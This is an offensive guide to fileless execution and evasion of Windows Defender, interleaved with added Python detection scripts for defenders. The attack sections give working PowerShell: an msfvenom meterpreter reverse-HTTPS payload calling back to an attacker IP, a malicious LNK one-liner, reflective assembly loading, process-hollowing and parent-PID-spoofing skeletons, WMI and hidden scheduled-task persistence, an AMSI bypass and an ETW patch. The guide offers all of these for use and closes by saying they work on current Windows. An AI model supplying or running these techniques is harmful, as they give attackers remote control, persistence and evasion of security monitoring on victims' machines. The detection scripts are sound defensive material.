Bypassing Modern Windows Defender: A Real-World Guide to Fileless Execution
Introduction:
Modern AV solutions like Windows Defender have become increasingly effective at detecting traditional malware. This guide demonstrates a real, fileless execution method that evades detection by leveraging living-off-the-land binaries (LOLBins) and in-memory techniques.
Requirements:
- Initial access (RDP, phishing, etc.)
- Basic knowledge of PowerShell
- No third-party tools required
STEP 1: Understanding the Technique
We'll abuse certutil.exe (Microsoft-signed binary) to decode and execute a payload directly in memory, leaving no traces on disk.
STEP 2: The Attack Chain
1. Generate Payload (Bash):
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=your_ip LPORT=443 -f raw | base64 -w 0 > payload.b64
2. Create Malicious LNK File (cmd):
Paste this into a shortcut's target field:
powershell -w hidden -c "iex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((certutil -decode payload.b64 | Out-String))))"
3. Execute Filelessly (powershell):
$encoded = "BASE64_ENCODED_PAYLOAD_HERE"
$decoded = [System.Convert]::FromBase64String($encoded)
$assembly = [System.Reflection.Assembly]::Load($decoded)
$entryPoint = $assembly.EntryPoint
$entryPoint.Invoke($null, @(,[string[]] @()))
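Steps 1 and 2 leave a distinctive process-creation footprint, and the chain as written is not strictly fileless: payload.b64, the .lnk and (in Step 4) C:\Users\Public\script.ps1 all touch disk, so file telemetry applies alongside command-line telemetry. The following Python script is an added defender-side example, not code from this guide: it triages constructed Sysmon Event ID 1-style process records (the field names Image, ParentImage and CommandLine are an assumption about the export format) against the indicators visible in the commands above, and decodes any -EncodedCommand argument (base64 of UTF-16LE) so the rules also see the decoded script.

```python
"""Process-creation triage for the LOLBin / in-memory pattern of Steps 1-2.
Added defender-side example; not part of the original guide. The records below
are constructed to resemble Sysmon Event ID 1 (Image, ParentImage, CommandLine);
the field names are an assumption, not a real export."""
import base64
import re

# Matches -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_ARG = re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)

# Indicators taken from the command lines shown on the page.
RULES = [
    ("certutil_decode",      r"certutil(\.exe)?\s+[-/]decode"),
    ("ps_hidden_window",     r"powershell(\.exe)?.*\s-w(indowstyle)?\s+hidden"),
    ("ps_invoke_expression", r"\b(iex|invoke-expression)\b"),
    ("ps_base64_decode",     r"FromBase64String"),
    ("ps_reflective_load",   r"Reflection\.Assembly\]::Load\("),
    ("ps_encoded_command",   ENCODED_ARG.pattern),
]


def decode_encoded_command(command_line):
    """Return the UTF-16LE script carried by -EncodedCommand, or None."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not the padding/encoding PowerShell itself would produce


def triage_event(event):
    """Run every rule over the command line plus its decoded -enc payload."""
    cmd = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    text = cmd if decoded is None else cmd + "\n" + decoded
    hits = [name for name, pattern in RULES if re.search(pattern, text, re.IGNORECASE)]
    return {"Image": event.get("Image", ""), "ParentImage": event.get("ParentImage", ""),
            "hits": hits, "decoded": decoded}


def triage_events(events):
    """Keep only the records that tripped at least one rule."""
    return [r for r in (triage_event(e) for e in events) if r["hits"]]


# Constructed sample data: the page's own command lines plus one benign process.
SAMPLE_SCRIPT = r"iex([System.IO.File]::ReadAllText('C:\Users\Public\script.ps1'))"
SAMPLE_ENC = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex([System.Text.Encoding]::UTF8.GetString('
                    '[System.Convert]::FromBase64String((certutil -decode payload.b64 | Out-String))))"'},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + SAMPLE_ENC},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for finding in triage_events(SAMPLE_EVENTS):
        print(finding["Image"], finding["hits"])
        if finding["decoded"]:
            print("  decoded -enc:", finding["decoded"])
```

The rules deliberately key on behaviour (hidden window, base64 decode, in-memory assembly load, certutil used as a decoder) rather than on file names, since the filenames in Step 2 are trivially renamed while the command-line shape is what the technique depends on.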
STEP 3: Obfuscation & Evasion
1. Process Hollowing (powershell):
$proc = Start-Process -FilePath "C:\Windows\System32\notepad.exe" -WindowStyle Hidden -PassThru
[IntPtr]$addr = [Your_Native_API_Calls_Here]
[System.Runtime.InteropServices.Marshal]::Copy($shellcode, 0, $addr, $shellcode.Length)
$thread = [Your_Native_API_Calls_Here]
2. Parent PID Spoofing (powershell):
$parent = Get-Process -Name "explorer"
$startup = New-Object -TypeName "STARTUPINFO"
$startup.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($startup)
[Your_Native_API_Calls_Here] -ProcessHandle $parent.Handle -StartupInfo $startup
STEP 4: Persistence Techniques
1. WMI Event Subscription (powershell):
$filterArgs = @{
EventNamespace = 'root\subscription'
Name = "WindowsUpdateFilter"
Query = "SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
QueryLanguage = "WQL"
}
$filter = Set-WmiInstance -Namespace "root\subscription" -Class "__EventFilter" -Arguments $filterArgs
$consumerArgs = @{
Name = "WindowsUpdateConsumer"
CommandLineTemplate = "powershell.exe -nop -w hidden -c \"iex([System.IO.File]::ReadAllText('C:\Users\Public\script.ps1'))\""
}
$consumer = Set-WmiInstance -Namespace "root\subscription" -Class "CommandLineEventConsumer" -Arguments $consumerArgs
Set-WmiInstance -Namespace "root\subscription" -Class "__FilterToConsumerBinding" -Arguments @{
Filter = $filter
Consumer = $consumer
}
2. Hidden Scheduled Task (powershell):
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-nop -w hidden -enc BASE64_ENCODED_SCRIPT"
$trigger = New-ScheduledTaskTrigger -AtLogOn
$settings = New-ScheduledTaskSettingsSet -Hidden -DontStopOnIdleEnd
Register-ScheduledTask -TaskName "WindowsUpdateTask" -Action $action -Trigger $trigger -Settings $settings
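Both persistence mechanisms in Step 4 are fully enumerable by a defender: every WMI subscription is a filter, a consumer and a binding in root\subscription, and every scheduled task is a record with its action and settings. The following Python script is an added defender-side example, not code from this guide. Its records are constructed inline in a shape resembling Sysmon Event IDs 19/20/21 (WmiEventFilter, WmiEventConsumer, WmiEventBinding) and a scheduled-task listing; the field names are assumptions, not a real schema.

```python
"""Triage of the persistence artifacts from Step 4. Added defender-side example,
not part of the original guide. Records are constructed inline in a shape
resembling Sysmon Event IDs 19/20/21 (WMI filter / consumer / binding) and a
scheduled-task listing; the field names are assumptions, not a real schema."""
import re

# Command-line traits shared by the page's WMI consumer and scheduled task.
SUSPICIOUS_COMMAND = [
    ("hidden_window",      r"\s-w(indowstyle)?\s+hidden"),
    ("encoded_command",    r"\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"),
    ("invoke_expression",  r"\b(iex|invoke-expression)\b"),
    ("user_writable_path", r"\\Users\\Public\\|\\AppData\\|\\Temp\\"),
]
# A perf-counter modification filter is a timer in disguise: it fires every N seconds.
TIMER_FILTER = re.compile(r"__InstanceModificationEvent.*Win32_PerfFormattedData", re.IGNORECASE)
# Consumer classes that run arbitrary commands or scripts.
EXEC_CONSUMERS = {"CommandLineEventConsumer", "ActiveScriptEventConsumer"}


def command_flags(line):
    return [name for name, pat in SUSPICIOUS_COMMAND if re.search(pat, line, re.IGNORECASE)]


def triage_wmi(filters, consumers, bindings):
    """Walk every filter->consumer binding and list why it deserves a look."""
    by_filter = {f["Name"]: f for f in filters}
    by_consumer = {c["Name"]: c for c in consumers}
    findings = []
    for b in bindings:
        flt, con = by_filter.get(b["Filter"]), by_consumer.get(b["Consumer"])
        reasons = []
        if flt is None or con is None:
            reasons.append("dangling_binding")
        if con is not None and con["Type"] in EXEC_CONSUMERS:
            reasons.append("exec_consumer")
            reasons += command_flags(con.get("Destination", ""))
        if flt is not None and TIMER_FILTER.search(flt["Query"]):
            reasons.append("perf_counter_timer")
        if reasons:
            findings.append({"filter": b["Filter"], "consumer": b["Consumer"], "reasons": reasons})
    return findings


def triage_tasks(tasks):
    """Flag hidden tasks, encoded/hidden PowerShell actions and look-alike names."""
    findings = []
    for t in tasks:
        reasons = command_flags(f'{t["Execute"]} {t["Arguments"]}')
        if t.get("Hidden"):
            reasons.append("hidden_task")
        # Names borrowed from Microsoft components but registered outside \Microsoft\
        # are a triage hint, not a verdict: third-party updaters also trip this.
        if "update" in t["TaskName"].lower() and not t["TaskName"].startswith("\\Microsoft\\"):
            reasons.append("vendor_lookalike_name")
        if reasons:
            findings.append({"task": t["TaskName"], "reasons": reasons})
    return findings


# Constructed sample data: the default SCM binding next to the page's subscription.
WMI_FILTERS = [
    {"Name": "SCM Event Log Filter", "EventNamespace": "root\\cimv2",
     "Query": "select * from MSFT_SCMEventLogEvent"},
    {"Name": "WindowsUpdateFilter", "EventNamespace": "root\\subscription",
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA "
              "'Win32_PerfFormattedData_PerfOS_System'"},
]
WMI_CONSUMERS = [
    {"Name": "SCM Event Log Consumer", "Type": "NTEventLogEventConsumer", "Destination": ""},
    {"Name": "WindowsUpdateConsumer", "Type": "CommandLineEventConsumer",
     "Destination": "powershell.exe -nop -w hidden -c \"iex([System.IO.File]::ReadAllText("
                    "'C:\\Users\\Public\\script.ps1'))\""},
]
WMI_BINDINGS = [
    {"Filter": "SCM Event Log Filter", "Consumer": "SCM Event Log Consumer"},
    {"Filter": "WindowsUpdateFilter", "Consumer": "WindowsUpdateConsumer"},
]
TASKS = [
    {"TaskName": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag", "Hidden": False,
     "Execute": "%windir%\\system32\\defrag.exe", "Arguments": "-c -h"},
    {"TaskName": "\\WindowsUpdateTask", "Hidden": True, "Execute": "powershell.exe",
     "Arguments": "-nop -w hidden -enc " + "A" * 40},  # placeholder blob, constructed
]

if __name__ == "__main__":
    for f in triage_wmi(WMI_FILTERS, WMI_CONSUMERS, WMI_BINDINGS) + triage_tasks(TASKS):
        print(f)
```

On a live host the same inventory comes from Get-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding (plus __EventFilter and the consumer classes) and from Get-ScheduledTask; the benign SCM Event Log binding is kept in the sample so the rules show a clean record passing as well as a dirty one failing.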
Detection Avoidance
1. AMSI Bypass (must be first in script) (powershell):
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
2. ETW Patching (Prevents logging) (powershell):
$etw = [Ref].Assembly.GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance')
$etw.SetValue([System.Diagnostics.Eventing.EventProvider].new(), 0)
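Both one-liners are recorded by PowerShell script block logging (Event ID 4104) when the block is compiled, which is before it executes, and AMSI scans the same text before it runs, so putting the bypass first in the script does not hide the bypass itself. Script block logging is enabled through the EnableScriptBlockLogging value under HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging. The following Python script is an added defender-side example, not code from this guide: it scans constructed 4104 records (the ScriptBlockText and Path field names follow the event layout as an assumption) for the literal strings these two techniques carry.

```python
"""Scanner for PowerShell script block log entries (Event ID 4104) carrying the
AMSI / ETW tampering one-liners from the Detection Avoidance section. Added
defender-side example, not part of the original guide; the records are
constructed inline and the field names (ScriptBlockText, Path) follow the 4104
event layout as an assumption."""
import re

# Literal strings the two one-liners above carry when written as shown.
TAMPER_INDICATORS = [
    ("amsi_utils_type",    r"System\.Management\.Automation\.AmsiUtils"),
    ("amsi_init_failed",   r"\bamsiInitFailed\b"),
    ("amsi_scan_buffer",   r"\bAmsiScanBuffer\b"),
    ("etw_event_provider", r"System\.Diagnostics\.Eventing\.EventProvider"),
    ("etw_enabled_field",  r"\bm_enabled\b"),
    ("reflect_nonpublic",  r"\.GetField\([^)]*NonPublic"),
]


def scan_script_block(record):
    """Return the indicator names present in one 4104 record."""
    text = record.get("ScriptBlockText", "")
    return [name for name, pat in TAMPER_INDICATORS if re.search(pat, text, re.IGNORECASE)]


def scan_log(records):
    """Summarise every record that tripped an indicator."""
    findings = []
    for r in records:
        hits = scan_script_block(r)
        if not hits:
            continue
        findings.append({
            "indicators": hits,
            # An empty Path means the block did not come from a .ps1 on disk
            # (console, -c, -enc or IEX), which matches the page's delivery.
            "in_memory": not r.get("Path"),
            # Reflection into non-public members alone is only a medium signal;
            # naming the AMSI or ETW internals makes it high.
            "severity": "high" if any(h.startswith(("amsi_", "etw_")) for h in hits) else "medium",
        })
    return findings


# Constructed 4104 records: the two page one-liners, a benign script, and a
# benign reflection call that only reaches the medium tier.
SCRIPT_BLOCK_LOG = [
    {"EventID": 4104, "Path": "", "ScriptBlockText":
        "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
        ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"},
    {"EventID": 4104, "Path": "", "ScriptBlockText":
        "$etw = [Ref].Assembly.GetType('System.Diagnostics.Eventing.EventProvider')"
        ".GetField('m_enabled','NonPublic,Instance')"},
    {"EventID": 4104, "Path": r"C:\scripts\inventory.ps1", "ScriptBlockText":
        "Get-CimInstance Win32_OperatingSystem | Select-Object Caption, Version"},
    {"EventID": 4104, "Path": r"C:\scripts\console-probe.ps1", "ScriptBlockText":
        "$f = [System.Console].GetField('s_in','NonPublic,Static')"},
]

if __name__ == "__main__":
    for finding in scan_log(SCRIPT_BLOCK_LOG):
        print(finding)
```

On a real host the input is the Microsoft-Windows-PowerShell/Operational log filtered to Event ID 4104 (for example via Get-WinEvent); the literal-string rules here catch the one-liners exactly as the page prints them, and a production rule set would add normalisation for rewritten variants on top of the same indicator list.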
Considerations:
- Test first: Behavior varies across Windows 10/11 versions
- Update regularly: Microsoft patches LOLBin abuse techniques
- Combine techniques: Layer multiple evasion methods for better results
Final note:
This works as of Windows 11 23H2.
Defender updates may require technique modifications.